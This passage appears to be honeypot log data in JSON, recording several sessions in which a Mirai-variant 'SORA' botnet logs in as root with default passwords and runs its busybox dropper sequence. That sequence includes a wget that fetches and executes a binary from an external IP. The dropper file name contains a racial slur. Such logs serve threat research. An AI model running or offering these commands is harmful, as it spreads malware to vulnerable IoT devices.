  791. "@timestamp": "2018-09-15T04:13:03.388Z",
  792. "eventid": "command.input",
  793. "input": "/bin/busybox SORA"
  794. },
  795. {
  796. "@timestamp": "2018-09-15T04:13:03.347Z",
  797. "eventid": "command.input",
  798. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  799. },
  800. {
  801. "@timestamp": "2018-09-15T04:13:03.298Z",
  802. "eventid": "command.input",
  803. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  804. },
  805. {
  806. "@timestamp": "2018-09-15T04:13:03.295Z",
  807. "eventid": "command.input",
  808. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  809. },
  810. {
  811. "@timestamp": "2018-09-15T04:13:03.292Z",
  812. "eventid": "command.input",
  813. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  814. },
  815. {
  816. "@timestamp": "2018-09-15T04:13:03.290Z",
  817. "eventid": "command.input",
  818. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  819. },
  820. {
  821. "@timestamp": "2018-09-15T04:13:03.288Z",
  822. "eventid": "command.input",
  823. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  824. },
  825. {
  826. "@timestamp": "2018-09-15T04:13:03.286Z",
  827. "eventid": "command.input",
  828. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  829. },
  830. {
  831. "@timestamp": "2018-09-15T04:13:03.284Z",
  832. "eventid": "command.input",
  833. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  834. },
  835. {
  836. "@timestamp": "2018-09-15T04:13:03.281Z",
  837. "eventid": "command.input",
  838. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  839. },
  840. {
  841. "@timestamp": "2018-09-15T04:13:03.279Z",
  842. "eventid": "command.input",
  843. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  844. },
  845. {
  846. "@timestamp": "2018-09-15T04:13:03.277Z",
  847. "eventid": "command.input",
  848. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  849. },
  850. {
  851. "@timestamp": "2018-09-15T04:13:03.275Z",
  852. "eventid": "command.input",
  853. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  854. },
  855. {
  856. "@timestamp": "2018-09-15T04:13:03.273Z",
  857. "eventid": "command.input",
  858. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  859. },
  860. {
  861. "@timestamp": "2018-09-15T04:13:03.271Z",
  862. "eventid": "command.input",
  863. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  864. },
  865. {
  866. "@timestamp": "2018-09-15T04:13:03.269Z",
  867. "eventid": "command.input",
  868. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  869. },
  870. {
  871. "@timestamp": "2018-09-15T04:13:03.267Z",
  872. "eventid": "command.input",
  873. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  874. },
  875. {
  876. "@timestamp": "2018-09-15T04:13:03.265Z",
  877. "eventid": "command.input",
  878. "input": "sh"
  879. },
  880. {
  881. "@timestamp": "2018-09-15T04:13:03.262Z",
  882. "eventid": "command.input",
  883. "input": "shell"
  884. },
  885. {
  886. "@timestamp": "2018-09-15T04:13:03.259Z",
  887. "eventid": "command.input",
  888. "input": "system"
  889. },
  890. {
  891. "@timestamp": "2018-09-15T04:13:03.217Z",
  892. "eventid": "command.input",
  893. "input": "enable"
  894. },
  895. {
  896. "@timestamp": "2018-09-15T04:13:03.174Z",
  897. "eventid": "command.input",
  898. "input": ""
  899. },
  900. {
  901. "@timestamp": "2018-09-15T04:13:02.886Z",
  902. "eventid": "login.success",
  903. "geoip": {
  904. "city_name": "Las Vegas",
  905. "country_name": "United States"
  906. },
  907. "password": "admin",
  908. "username": "root"
  909. }
  910. ],
  911. "3a622d1d2b9b": [
  912. {
  913. "@timestamp": "2018-09-15T04:13:16.132Z",
  914. "eventid": "command.input",
  915. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  916. },
  917. {
  918. "@timestamp": "2018-09-15T04:13:16.038Z",
  919. "eventid": "command.input",
  920. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  921. },
  922. {
  923. "@timestamp": "2018-09-15T04:13:15.665Z",
  924. "eventid": "command.input",
  925. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  926. },
  927. {
  928. "@timestamp": "2018-09-15T04:13:15.570Z",
  929. "eventid": "command.input",
  930. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  931. },
  932. {
  933. "@timestamp": "2018-09-15T04:13:15.480Z",
  934. "eventid": "command.input",
  935. "input": "/bin/busybox SORA"
  936. },
  937. {
  938. "@timestamp": "2018-09-15T04:13:15.380Z",
  939. "eventid": "command.input",
  940. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  941. },
  942. {
  943. "@timestamp": "2018-09-15T04:13:15.279Z",
  944. "eventid": "command.input",
  945. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  946. },
  947. {
  948. "@timestamp": "2018-09-15T04:13:15.270Z",
  949. "eventid": "command.input",
  950. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  951. },
  952. {
  953. "@timestamp": "2018-09-15T04:13:15.269Z",
  954. "eventid": "command.input",
  955. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  956. },
  957. {
  958. "@timestamp": "2018-09-15T04:13:15.261Z",
  959. "eventid": "command.input",
  960. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  961. },
  962. {
  963. "@timestamp": "2018-09-15T04:13:15.259Z",
  964. "eventid": "command.input",
  965. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  966. },
  967. {
  968. "@timestamp": "2018-09-15T04:13:15.251Z",
  969. "eventid": "command.input",
  970. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  971. },
  972. {
  973. "@timestamp": "2018-09-15T04:13:15.249Z",
  974. "eventid": "command.input",
  975. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  976. },
  977. {
  978. "@timestamp": "2018-09-15T04:13:15.241Z",
  979. "eventid": "command.input",
  980. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  981. },
  982. {
  983. "@timestamp": "2018-09-15T04:13:15.239Z",
  984. "eventid": "command.input",
  985. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  986. },
  987. {
  988. "@timestamp": "2018-09-15T04:13:15.238Z",
  989. "eventid": "command.input",
  990. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  991. },
  992. {
  993. "@timestamp": "2018-09-15T04:13:15.230Z",
  994. "eventid": "command.input",
  995. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  996. },
  997. {
  998. "@timestamp": "2018-09-15T04:13:15.229Z",
  999. "eventid": "command.input",
  1000. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1001. },
  1002. {
  1003. "@timestamp": "2018-09-15T04:13:15.221Z",
  1004. "eventid": "command.input",
  1005. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1006. },
  1007. {
  1008. "@timestamp": "2018-09-15T04:13:15.219Z",
  1009. "eventid": "command.input",
  1010. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1011. },
  1012. {
  1013. "@timestamp": "2018-09-15T04:13:15.212Z",
  1014. "eventid": "command.input",
  1015. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1016. },
  1017. {
  1018. "@timestamp": "2018-09-15T04:13:15.210Z",
  1019. "eventid": "command.input",
  1020. "input": "sh"
  1021. },
  1022. {
  1023. "@timestamp": "2018-09-15T04:13:15.208Z",
  1024. "eventid": "command.input",
  1025. "input": "shell"
  1026. },
  1027. {
  1028. "@timestamp": "2018-09-15T04:13:15.206Z",
  1029. "eventid": "command.input",
  1030. "input": "system"
  1031. },
  1032. {
  1033. "@timestamp": "2018-09-15T04:13:15.118Z",
  1034. "eventid": "command.input",
  1035. "input": "enable"
  1036. },
  1037. {
  1038. "@timestamp": "2018-09-15T04:13:15.029Z",
  1039. "eventid": "command.input",
  1040. "input": ""
  1041. },
  1042. {
  1043. "@timestamp": "2018-09-15T04:13:14.120Z",
  1044. "eventid": "login.success",
  1045. "geoip": {
  1046. "city_name": "Las Vegas",
  1047. "country_name": "United States"
  1048. },
  1049. "password": "admin",
  1050. "username": "root"
  1051. }
  1052. ],
  1053. "4a2173a89839": [
  1054. {
  1055. "@timestamp": "2018-09-15T04:13:08.756Z",
  1056. "eventid": "command.input",
  1057. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1058. },
  1059. {
  1060. "@timestamp": "2018-09-15T04:13:08.662Z",
  1061. "eventid": "command.input",
  1062. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1063. },
  1064. {
  1065. "@timestamp": "2018-09-15T04:13:08.277Z",
  1066. "eventid": "command.input",
  1067. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1068. },
  1069. {
  1070. "@timestamp": "2018-09-15T04:13:08.156Z",
  1071. "eventid": "command.input",
  1072. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1073. },
  1074. {
  1075. "@timestamp": "2018-09-15T04:13:08.007Z",
  1076. "eventid": "command.input",
  1077. "input": "/bin/busybox SORA"
  1078. },
  1079. {
  1080. "@timestamp": "2018-09-15T04:13:07.896Z",
  1081. "eventid": "command.input",
  1082. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1083. },
  1084. {
  1085. "@timestamp": "2018-09-15T04:13:07.682Z",
  1086. "eventid": "command.input",
  1087. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1088. },
  1089. {
  1090. "@timestamp": "2018-09-15T04:13:07.673Z",
  1091. "eventid": "command.input",
  1092. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1093. },
  1094. {
  1095. "@timestamp": "2018-09-15T04:13:07.671Z",
  1096. "eventid": "command.input",
  1097. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1098. },
  1099. {
  1100. "@timestamp": "2018-09-15T04:13:07.664Z",
  1101. "eventid": "command.input",
  1102. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1103. },
  1104. {
  1105. "@timestamp": "2018-09-15T04:13:07.662Z",
  1106. "eventid": "command.input",
  1107. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1108. },
  1109. {
  1110. "@timestamp": "2018-09-15T04:13:07.661Z",
  1111. "eventid": "command.input",
  1112. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1113. },
  1114. {
  1115. "@timestamp": "2018-09-15T04:13:07.653Z",
  1116. "eventid": "command.input",
  1117. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1118. },
  1119. {
  1120. "@timestamp": "2018-09-15T04:13:07.651Z",
  1121. "eventid": "command.input",
  1122. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1123. },
  1124. {
  1125. "@timestamp": "2018-09-15T04:13:07.643Z",
  1126. "eventid": "command.input",
  1127. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1128. },
  1129. {
  1130. "@timestamp": "2018-09-15T04:13:07.642Z",
  1131. "eventid": "command.input",
  1132. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1133. },
  1134. {
  1135. "@timestamp": "2018-09-15T04:13:07.634Z",
  1136. "eventid": "command.input",
  1137. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1138. },
  1139. {
  1140. "@timestamp": "2018-09-15T04:13:07.632Z",
  1141. "eventid": "command.input",
  1142. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1143. },
  1144. {
  1145. "@timestamp": "2018-09-15T04:13:07.631Z",
  1146. "eventid": "command.input",
  1147. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1148. },
  1149. {
  1150. "@timestamp": "2018-09-15T04:13:07.623Z",
  1151. "eventid": "command.input",
  1152. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1153. },
  1154. {
  1155. "@timestamp": "2018-09-15T04:13:07.622Z",
  1156. "eventid": "command.input",
  1157. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1158. },
  1159. {
  1160. "@timestamp": "2018-09-15T04:13:07.620Z",
  1161. "eventid": "command.input",
  1162. "input": "sh"
  1163. },
  1164. {
  1165. "@timestamp": "2018-09-15T04:13:07.613Z",
  1166. "eventid": "command.input",
  1167. "input": "shell"
  1168. },
  1169. {
  1170. "@timestamp": "2018-09-15T04:13:07.611Z",
  1171. "eventid": "command.input",
  1172. "input": "system"
  1173. },
  1174. {
  1175. "@timestamp": "2018-09-15T04:13:07.603Z",
  1176. "eventid": "command.input",
  1177. "input": "enable"
  1178. },
  1179. {
  1180. "@timestamp": "2018-09-15T04:13:05.151Z",
  1181. "eventid": "command.input",
  1182. "input": ""
  1183. },
  1184. {
  1185. "@timestamp": "2018-09-15T04:13:04.338Z",
  1186. "eventid": "login.success",
  1187. "geoip": {
  1188. "city_name": "Las Vegas",
  1189. "country_name": "United States"
  1190. },
  1191. "password": "root",
  1192. "username": "root"
  1193. }
  1194. ],
  1195. "754620698f23": [
  1196. {
  1197. "@timestamp": "2018-09-15T04:13:08.766Z",
  1198. "eventid": "command.input",
  1199. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1200. },
  1201. {
  1202. "@timestamp": "2018-09-15T04:13:08.659Z",
  1203. "eventid": "command.input",
  1204. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1205. },
  1206. {
  1207. "@timestamp": "2018-09-15T04:13:08.272Z",
  1208. "eventid": "command.input",
  1209. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1210. },
  1211. {
  1212. "@timestamp": "2018-09-15T04:13:08.161Z",
  1213. "eventid": "command.input",
  1214. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1215. },
  1216. {
  1217. "@timestamp": "2018-09-15T04:13:08.009Z",
  1218. "eventid": "command.input",
  1219. "input": "/bin/busybox SORA"
  1220. },
  1221. {
  1222. "@timestamp": "2018-09-15T04:13:07.909Z",
  1223. "eventid": "command.input",
  1224. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1225. },
  1226. {
  1227. "@timestamp": "2018-09-15T04:13:07.767Z",
  1228. "eventid": "command.input",
  1229. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1230. },
  1231. {
  1232. "@timestamp": "2018-09-15T04:13:07.764Z",
  1233. "eventid": "command.input",
  1234. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1235. },
  1236. {
  1237. "@timestamp": "2018-09-15T04:13:07.757Z",
  1238. "eventid": "command.input",
  1239. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1240. },
  1241. {
  1242. "@timestamp": "2018-09-15T04:13:07.756Z",
  1243. "eventid": "command.input",
  1244. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1245. },
  1246. {
  1247. "@timestamp": "2018-09-15T04:13:07.748Z",
  1248. "eventid": "command.input",
  1249. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1250. },
  1251. {
  1252. "@timestamp": "2018-09-15T04:13:07.747Z",
  1253. "eventid": "command.input",
  1254. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1255. },
  1256. {
  1257. "@timestamp": "2018-09-15T04:13:07.745Z",
  1258. "eventid": "command.input",
  1259. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1260. },
  1261. {
  1262. "@timestamp": "2018-09-15T04:13:07.737Z",
  1263. "eventid": "command.input",
  1264. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1265. },
  1266. {
  1267. "@timestamp": "2018-09-15T04:13:07.736Z",
  1268. "eventid": "command.input",
  1269. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1270. },
  1271. {
  1272. "@timestamp": "2018-09-15T04:13:07.729Z",
  1273. "eventid": "command.input",
  1274. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1275. },
  1276. {
  1277. "@timestamp": "2018-09-15T04:13:07.727Z",
  1278. "eventid": "command.input",
  1279. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1280. },
  1281. {
  1282. "@timestamp": "2018-09-15T04:13:07.725Z",
  1283. "eventid": "command.input",
  1284. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1285. },
  1286. {
  1287. "@timestamp": "2018-09-15T04:13:07.721Z",
  1288. "eventid": "command.input",
  1289. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1290. },
  1291. {
  1292. "@timestamp": "2018-09-15T04:13:07.714Z",
  1293. "eventid": "command.input",
  1294. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1295. },
  1296. {
  1297. "@timestamp": "2018-09-15T04:13:07.711Z",
  1298. "eventid": "command.input",
  1299. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1300. },
  1301. {
  1302. "@timestamp": "2018-09-15T04:13:07.710Z",
  1303. "eventid": "command.input",
  1304. "input": "sh"
  1305. },
  1306. {
  1307. "@timestamp": "2018-09-15T04:13:07.702Z",
  1308. "eventid": "command.input",
  1309. "input": "shell"
  1310. },
  1311. {
  1312. "@timestamp": "2018-09-15T04:13:07.701Z",
  1313. "eventid": "command.input",
  1314. "input": "system"
  1315. },
  1316. {
  1317. "@timestamp": "2018-09-15T04:13:07.693Z",
  1318. "eventid": "command.input",
  1319. "input": "enable"
  1320. },
  1321. {
  1322. "@timestamp": "2018-09-15T04:13:05.981Z",
  1323. "eventid": "command.input",
  1324. "input": ""
  1325. },
  1326. {
  1327. "@timestamp": "2018-09-15T04:13:05.152Z",
  1328. "eventid": "login.success",
  1329. "geoip": {
  1330. "city_name": "Las Vegas",
  1331. "country_name": "United States"
  1332. },
  1333. "password": "admin",
  1334. "username": "root"
  1335. }
  1336. ],
  1337. "8c6b47af4e07": [
  1338. {
  1339. "@timestamp": "2018-09-15T04:13:36.032Z",
  1340. "eventid": "command.input",
  1341. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1342. },
  1343. {
  1344. "@timestamp": "2018-09-15T04:13:35.945Z",
  1345. "eventid": "command.input",
  1346. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1347. },
  1348. {
  1349. "@timestamp": "2018-09-15T04:13:35.594Z",
  1350. "eventid": "command.input",
  1351. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1352. },
  1353. {
  1354. "@timestamp": "2018-09-15T04:13:35.505Z",
  1355. "eventid": "command.input",
  1356. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1357. },
  1358. {
  1359. "@timestamp": "2018-09-15T04:13:35.374Z",
  1360. "eventid": "command.input",
  1361. "input": "/bin/busybox SORA"
  1362. },
  1363. {
  1364. "@timestamp": "2018-09-15T04:13:35.290Z",
  1365. "eventid": "command.input",
  1366. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1367. },
  1368. {
  1369. "@timestamp": "2018-09-15T04:13:35.200Z",
  1370. "eventid": "command.input",
  1371. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1372. },
  1373. {
  1374. "@timestamp": "2018-09-15T04:13:35.196Z",
  1375. "eventid": "command.input",
  1376. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1377. },
  1378. {
  1379. "@timestamp": "2018-09-15T04:13:35.194Z",
  1380. "eventid": "command.input",
  1381. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1382. },
  1383. {
  1384. "@timestamp": "2018-09-15T04:13:35.192Z",
  1385. "eventid": "command.input",
  1386. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1387. },
  1388. {
  1389. "@timestamp": "2018-09-15T04:13:35.190Z",
  1390. "eventid": "command.input",
  1391. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1392. },
  1393. {
  1394. "@timestamp": "2018-09-15T04:13:35.188Z",
  1395. "eventid": "command.input",
  1396. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1397. },
  1398. {
  1399. "@timestamp": "2018-09-15T04:13:35.185Z",
  1400. "eventid": "command.input",
  1401. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1402. },
  1403. {
  1404. "@timestamp": "2018-09-15T04:13:35.183Z",
  1405. "eventid": "command.input",
  1406. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1407. },
  1408. {
  1409. "@timestamp": "2018-09-15T04:13:35.180Z",
  1410. "eventid": "command.input",
  1411. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1412. },
  1413. {
  1414. "@timestamp": "2018-09-15T04:13:35.178Z",
  1415. "eventid": "command.input",
  1416. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1417. },
  1418. {
  1419. "@timestamp": "2018-09-15T04:13:35.175Z",
  1420. "eventid": "command.input",
  1421. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1422. },
  1423. {
  1424. "@timestamp": "2018-09-15T04:13:35.171Z",
  1425. "eventid": "command.input",
  1426. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1427. },
  1428. {
  1429. "@timestamp": "2018-09-15T04:13:35.168Z",
  1430. "eventid": "command.input",
  1431. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1432. },
  1433. {
  1434. "@timestamp": "2018-09-15T04:13:35.165Z",
  1435. "eventid": "command.input",
  1436. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1437. },
  1438. {
  1439. "@timestamp": "2018-09-15T04:13:35.163Z",
  1440. "eventid": "command.input",
  1441. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1442. },
  1443. {
  1444. "@timestamp": "2018-09-15T04:13:35.160Z",
  1445. "eventid": "command.input",
  1446. "input": "sh"
  1447. },
  1448. {
  1449. "@timestamp": "2018-09-15T04:13:35.157Z",
  1450. "eventid": "command.input",
  1451. "input": "shell"
  1452. },
  1453. {
  1454. "@timestamp": "2018-09-15T04:13:35.155Z",
  1455. "eventid": "command.input",
  1456. "input": "system"
  1457. },
  1458. {
  1459. "@timestamp": "2018-09-15T04:13:35.073Z",
  1460. "eventid": "command.input",
  1461. "input": "enable"
  1462. },
  1463. {
  1464. "@timestamp": "2018-09-15T04:13:34.993Z",
  1465. "eventid": "command.input",
  1466. "input": ""
  1467. },
  1468. {
  1469. "@timestamp": "2018-09-15T04:13:34.500Z",
  1470. "eventid": "login.success",
  1471. "geoip": {
  1472. "city_name": "Las Vegas",
  1473. "country_name": "United States"
  1474. },
  1475. "password": "vizxv",
  1476. "username": "root"
  1477. }
  1478. ],
  1479. "9aebadf5f9db": [
  1480. {
  1481. "@timestamp": "2018-09-15T04:12:44.376Z",
  1482. "eventid": "command.input",
  1483. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1484. },
  1485. {
  1486. "@timestamp": "2018-09-15T04:12:44.330Z",
  1487. "eventid": "command.input",
  1488. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1489. },
  1490. {
  1491. "@timestamp": "2018-09-15T04:12:44.153Z",
  1492. "eventid": "command.input",
  1493. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1494. },
  1495. {
  1496. "@timestamp": "2018-09-15T04:12:44.104Z",
  1497. "eventid": "command.input",
  1498. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1499. },
  1500. {
  1501. "@timestamp": "2018-09-15T04:12:44.014Z",
  1502. "eventid": "command.input",
  1503. "input": "/bin/busybox SORA"
  1504. },
  1505. {
  1506. "@timestamp": "2018-09-15T04:12:43.973Z",
  1507. "eventid": "command.input",
  1508. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1509. },
  1510. {
  1511. "@timestamp": "2018-09-15T04:12:43.924Z",
  1512. "eventid": "command.input",
  1513. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1514. },
  1515. {
  1516. "@timestamp": "2018-09-15T04:12:43.920Z",
  1517. "eventid": "command.input",
  1518. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1519. },
  1520. {
  1521. "@timestamp": "2018-09-15T04:12:43.918Z",
  1522. "eventid": "command.input",
  1523. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1524. },
  1525. {
  1526. "@timestamp": "2018-09-15T04:12:43.916Z",
  1527. "eventid": "command.input",
  1528. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1529. },
  1530. {
  1531. "@timestamp": "2018-09-15T04:12:43.914Z",
  1532. "eventid": "command.input",
  1533. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1534. },
  1535. {
  1536. "@timestamp": "2018-09-15T04:12:43.912Z",
  1537. "eventid": "command.input",
  1538. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1539. },
  1540. {
  1541. "@timestamp": "2018-09-15T04:12:43.910Z",
  1542. "eventid": "command.input",
  1543. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1544. },
  1545. {
  1546. "@timestamp": "2018-09-15T04:12:43.908Z",
  1547. "eventid": "command.input",
  1548. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1549. },
  1550. {
  1551. "@timestamp": "2018-09-15T04:12:43.906Z",
  1552. "eventid": "command.input",
  1553. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1554. },
  1555. {
  1556. "@timestamp": "2018-09-15T04:12:43.904Z",
  1557. "eventid": "command.input",
  1558. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1559. },
  1560. {
  1561. "@timestamp": "2018-09-15T04:12:43.902Z",
  1562. "eventid": "command.input",
  1563. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1564. },
  1565. {
  1566. "@timestamp": "2018-09-15T04:12:43.900Z",
  1567. "eventid": "command.input",
  1568. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1569. },
  1570. {
  1571. "@timestamp": "2018-09-15T04:12:43.898Z",
  1572. "eventid": "command.input",
  1573. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1574. },
  1575. {
  1576. "@timestamp": "2018-09-15T04:12:43.896Z",
  1577. "eventid": "command.input",
  1578. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1579. },
  1580. {
  1581. "@timestamp": "2018-09-15T04:12:43.894Z",
  1582. "eventid": "command.input",
  1583. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1584. },
  1585. {
  1586. "@timestamp": "2018-09-15T04:12:43.892Z",
  1587. "eventid": "command.input",
  1588. "input": "sh"
  1589. },
  1590. {
  1591. "@timestamp": "2018-09-15T04:12:43.889Z",
  1592. "eventid": "command.input",
  1593. "input": "shell"
  1594. },
  1595. {
  1596. "@timestamp": "2018-09-15T04:12:43.886Z",
  1597. "eventid": "command.input",
  1598. "input": "system"
  1599. },
  1600. {
  1601. "@timestamp": "2018-09-15T04:12:43.844Z",
  1602. "eventid": "command.input",
  1603. "input": "enable"
  1604. },
  1605. {
  1606. "@timestamp": "2018-09-15T04:12:43.801Z",
  1607. "eventid": "command.input",
  1608. "input": ""
  1609. },
  1610. {
  1611. "@timestamp": "2018-09-15T04:12:43.514Z",
  1612. "eventid": "login.success",
  1613. "geoip": {
  1614. "city_name": "Las Vegas",
  1615. "country_name": "United States"
  1616. },
  1617. "password": "vizxv",
  1618. "username": "root"
  1619. }
  1620. ],
  1621. "9ec72e2fd074": [
